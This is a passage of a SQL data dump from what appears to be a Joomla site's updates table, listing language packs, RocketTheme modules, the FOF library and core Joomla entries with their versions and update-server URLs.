LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1382,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1383,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1384,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1385,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1386,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1387,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1388,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1389,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1390,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1391,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1392,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1393,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1394,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1395,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1396,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1397,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1398,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1399,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1400,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1401,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1402,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1403,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1404,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1405,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1406,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1407,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1408,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1409,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1410,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1411,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1412,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1413,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1414,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1415,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1416,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1417,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1418,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1419,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1420,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1421,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1422,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1423,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1424,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1425,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1426,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1427,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1428,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1429,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1430,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1431,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1432,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1433,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1434,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1435,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1436,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1437,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1438,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1439,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1440,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1441,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1442,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1443,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1444,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1445,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1446,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1447,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1448,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1449,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1450,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1451,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1452,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1453,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1454,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1455,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1456,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1457,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1458,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1459,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1460,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1461,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1462,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1463,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1464,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1465,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1466,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1467,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1468,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1469,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1470,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1471,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1472,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1473,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1474,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1475,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1476,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1477,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1478,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1479,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1480,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1481,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1482,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1483,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1484,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1485,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1486,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1487,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1488,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1489,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1490,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1491,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1492,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1493,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1494,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1495,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1496,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1497,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1498,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1499,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1500,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1501,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1502,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1503,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1504,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1505,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1506,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1507,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1508,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1509,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1510,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1511,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1512,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1513,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1514,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1515,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1516,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1517,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1518,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1519,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1520,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1521,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1522,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1523,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1524,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1525,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1526,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1527,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1528,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1529,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1530,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1531,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1532,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1533,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1534,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1535,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1536,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1537,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1538,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1539,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1540,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1541,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1542,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1543,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1544,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1545,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1546,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1547,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1548,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1549,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1550,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1551,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1552,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1553,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1554,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1555,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1556,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1558,1,0,'Joomla','','joomla','file','',0,'3.9.8','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(1559,1,0,'Joomla','','joomla','file','',0,'3.9.8','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(1560,1,0,'Joomla','','joomla','file','',0,'3.9.8','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(1561,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1562,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1563,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1564,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1565,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1566,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1567,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1568,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1569,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1570,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1571,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1572,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1573,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1574,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1575,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1576,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1577,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1578,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1579,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1580,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1581,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1582,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1583,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1584,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1585,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1586,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1587,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1588,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1589,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1590,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1591,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1592,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1593,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1594,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1595,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1596,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1597,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1598,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1599,3,0,'German 